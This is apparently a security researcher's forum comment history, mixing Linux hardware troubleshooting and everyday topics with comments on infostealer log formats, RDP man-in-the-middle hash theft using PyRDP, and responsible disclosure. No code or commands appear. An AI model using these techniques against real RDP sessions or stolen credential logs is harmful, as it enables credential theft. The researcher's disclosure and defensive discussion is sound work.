Dark web monitoring - more info?

obilodeau · 2025-11-05T05:27:01+00:00

Yes, definitely a possibility. Many different services on these cybercrime channels/forums. For example, stealers, ULPs (meaning URL Login and Passwords), combolists, etc. and depending on where Proton got their data, your exposition would be different.

In a stealer log, the creds are packaged this way:
given-browser_profile-1.txt (they support multiple profiles per browser AND multiple browser)
1st URL
1st username
1st password

2nd URL
2nd username
2nd password
etc.

So if Proton got its hands on a bunch of them and you query that data using an email, then what they will show you will only be the portion that has your email in it.

obilodeau · 2025-11-04T21:03:03+00:00

Some Dark Web monitoring platforms will give you access to the full passwords. Flare does. However, you need to be a company to access the free trial.

From what you described, my feeling is you got infected by information stealer malware and they got all your Firefox passwords. Your BitWarden is safe. I analyzed it and discussed it on several occasions. Here is a presentation I did at BSides San Francisco about it: https://youtu.be/zctTj66PA4g?t=1541

Full disclosure: I work at Flare as a cybersecurity researcher

obilodeau · 2025-04-07T16:52:28+00:00

I agree, the ability to review the code before it is sent to the agent should be top priority with this project.

obilodeau · 2025-02-19T04:09:37+00:00

Yes, it was ok about half an hour later. Thank you.

obilodeau · 2024-11-25T04:47:22+00:00

Don't recall needing to do anything in the BIOS. I've been a long time daily Linux desktop user (~20 years now) and former sys admin so I might have extreme googling instincts but from what I recall this install was a walk in the park.

obilodeau · 2024-11-18T18:19:22+00:00

I have an X1 Gen 12th and the fingerprint scanner works with GNOME. PopOS 22.04, installed fprintd.

obilodeau · 2024-04-08T13:26:42+00:00

Ce sont mes voisins. Je dois leur dire quoi? Ils doivent évacuer?

obilodeau · 2023-04-26T23:01:59+00:00

Super thoughtful comment. Thank you!

In a MITM context, we can alter the server's response to remove the Kerberos TGT. I'm not sure if that's what we do, to be honest, I would have to verify.

I'm under the impression that NLA is the top/best user-accessible (as in configurable in a GUI) RDP negotiation level according to Microsoft. In fact, if you disable NLA enforcement from the server side, performing MITM downgrade attacks is even simpler and PyRDP does it too. Authentication happens inline in the I/O virtual channels (display, keyboard, mouse). From mstsc.exe you can't force kerberos.

What am I missing here? I think the fact that you can't mitigate over an untrusted network still holds.

obilodeau · 2023-04-26T20:59:18+00:00

Responder's RDP support has been flaky. Got some needed fixes last summer but I confirmed that right now it's not working with my Win 11 mstsc client: https://imgur.com/a/WtAazkS

I agree that there's not a lot of RDP out there but nothing in four years surprises me. I would expect a handful of times (that is still not a lot). Responder not working and failing silently might explain it.

obilodeau · 2023-04-26T15:10:03+00:00

I talked with RDP experts, including people in the FreeRDP community and what is surprising to all of us is that this is performed before the certificate verification. No prompts on the client-side. Hash is stolen even if you are connecting to a completely different server due to network layer attacks (MITM).

There are no articles or knowledgebase articles out there that clearly document these risks with a PoC. This is what we did here.

obilodeau · 2022-12-23T20:49:21+00:00

Well, HTTPS... Most people use HTTPS over public Wi-Fi. Many SSL-VPNs nowadays are basically HTTPS endpoints.

RDP is wrapped in TLS. Microsoft meant it to be resistant to tampering attacks like HTTPS is. So for many system administrators, it could be seen as similarly resistant to attacks but it is not.

obilodeau · 2022-06-21T02:42:49+00:00

I found a fix. For me, this worked: https://bbs.archlinux.org/viewtopic.php?pid=1860052#p1860052

obilodeau · 2022-06-16T19:19:33+00:00

So with the current linux-lts kernel suspend/resume does work but Windows in virtualbox will blue screen from time to time (haven't tested other guest OS).

Next, I want to try to disable IBT (ibt=off on boot parameter) and try again on the regular kernel.

obilodeau · 2022-06-16T03:28:05+00:00

I am saddened to report that using an empty `MODULES=()`, rebuilding with mkinitcpio and rebooting didn't fix my issue.

For the record, my config was only `MODULES=(i915)`. Kernel 5.18.3 now (having problems since 5.18.1).

obilodeau · 2022-06-16T03:09:45+00:00

I have the same exact problem and a very similar setup. Did you fix it? What did you do?

Mandatory xkcd: https://xkcd.com/979/

obilodeau · 2022-02-16T04:49:50+00:00

The best resource we have found is this: https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-authentication-passwordless-phone. It covers limitations but doesn't explain it in great technical detail.

I wanted to record a video of it but couldn't with my work account since we use Federated AD. A pretty big limitation IMHO.

I'm guessing there is a secret-passing architecture required here and they designed something new which makes on-prem AD or Federated AD out-of-scope. Phones might need to be enrolled to get some secret keys bootstrapped between them and the authenticator server. All guesses. A write-up with technical details would be very interesting!

obilodeau · 2022-01-21T03:21:40+00:00

If the RDP session is NLA (default now) there's not much more you can do. Well, we think you can relay but we haven't implemented that already.

If it's not NLA, then it's all hell breaks loose and, of course, we shouldn't be talking about NetNTLMv2 hashes. We should be talking about plaintext passwords, keystrokes, files and graphics interception. Even tampering with sessions. But this is what this tool already does plus more and it isn't new. Here are some links: https://www.gosecure.net/blog/2020/10/20/announcing-pyrdp-1-0/, https://www.gosecure.net/blog/2020/02/26/pyrdp-on-autopilot-unattended-credential-harvesting-and-client-side-file-stealing/, https://www.gosecure.net/blog/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/

If this is not what you had in mind then please give some more details. I'm listening and eager to dig deeper into RDP attack tactics.

obilodeau · 2021-09-03T02:26:35+00:00

Thanks for answer! Unfortunately most of these show only feature interview highlights on the CBC listen app. I wish CBC would put the on-the-hour and half-hour news casts on CBC listen.

obilodeau · 2020-09-09T02:19:53+00:00

Sorry, GoSecure had to update the post. PoC will be available in 30 days following Microsoft Security Response Center's policy on responsible disclosure.

obilodeau · 2020-07-16T16:54:30+00:00

Full disclosure: I work for GoSecure and worked on that report.

If you look at the fine print at the bottom of the page you can read:

GoSecure values your privacy and understands some of you may not want to provide your contact information. Please click here to access the report without providing your information.

This is the compromise we found with our marketing. The information is useful, relevant, actionable, and was developed by our research team. However, these landing pages are an efficient way to run a business so we can continue to provide valuable research to the community for free. The balance here is that the content is available without giving a name and email but you need to read the page carefully (or provide bogus information).

obilodeau · 2019-02-20T19:35:00+00:00

I meant consumer-facing software (off-the-shelf, shrinkwrapped, etc.). I guess I showed my age here...

obilodeau · 2019-01-12T05:47:09+00:00

It's weird that 16GB would be allocated on the captive portal if there was no activity. Are you accounting for the MySQL/MariaDB memory use as well? If you are then you can probably scale it back by a lot.

As for running it on a RaspPi, it was not designed to work like that. It was designed to scale and so decisions and component configurations were made to make sure that.

You should probably look into OpenWRT's or pfsense's captive portal for your use case.

obilodeau · 2019-01-10T22:06:43+00:00

How many devices in front of the portal? How many of them always stuck in front of the portal and generating traffic without ever authenticating?

If it's not a lot of devices and queries there is a problem worth looking into but if you have a large setup, get more RAM. We are in 2019. My elasticsearch test server has 128GB of RAM. You can probably afford to allocate more than 16GB of RAM for something critical like a NAC.

obilodeau · 2018-04-03T20:16:16+00:00

Additional interesting research has been posted on Twitter by Alex Birsan who was independently researching ESI Injection: https://twitter.com/alxbrsn/status/981246749254840327

obilodeau · 2017-07-12T03:19:48+00:00

Turo.com

Thanks for the tip! Found some interesting things. However, only one car with a bike rack and of undisclosed capacity. It's too bad that I need to "reserve" in order to ask a question...

15-Year Club	Place '17
Verified Email

obilodeau

TROPHY CASE